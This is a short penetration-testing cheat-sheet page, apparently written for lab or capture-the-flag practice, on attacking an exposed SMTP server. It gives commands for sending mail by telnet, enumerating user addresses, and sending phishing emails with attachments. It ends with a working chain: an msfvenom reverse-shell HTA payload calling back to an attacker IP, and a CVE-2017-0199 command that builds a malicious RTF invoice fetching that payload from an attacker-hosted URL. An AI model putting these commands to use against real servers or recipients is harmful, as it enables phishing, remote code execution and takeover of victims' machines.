SMTP Server Found

Basic telnet send mail

telnet reel 25
helo pogo.com
MAIL FROM: <POGO@POGO.COM>
RCPT TO: <NICO@MEGABANK.COM>
DATA
This is the data!
.

quit

Enumerate Emails

smtp-user-enum -m 50 -M RCPT -f 'nico@megabank.com' -U users -t reel -p 25 -D megabank.com

Send Email With attachment

swaks -t daniela@beyond.com -t marcus@beyond.com --from john@beyond.com --attach @config.Library-ms --server 192.168.225.242 --body @body.txt --header "Subject: Staging Script" --suppress-data -ap
sendEmail -f 0xdf@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a invoice.rtf -s 10.10.10.77 -v

Attachments can be malicious in many ways.

  • Add a canary image to ping back to you to in a word document

  • Embed malicious code in pdfs ex. evilpdf

  • Macros are hard to pop these days but you could add macros to a document.

  • generate rtf payload https://github.com/bhdresh/CVE-2017-0199

    • msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.91 LPORT=9001 EXITFUNC=thread -f hta-psh -o htapsh.hta

    • python2 cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://10.10.14.91:8000/htapsh.hta

PreviousSign Powershell scriptNextSOCAT to redirect ports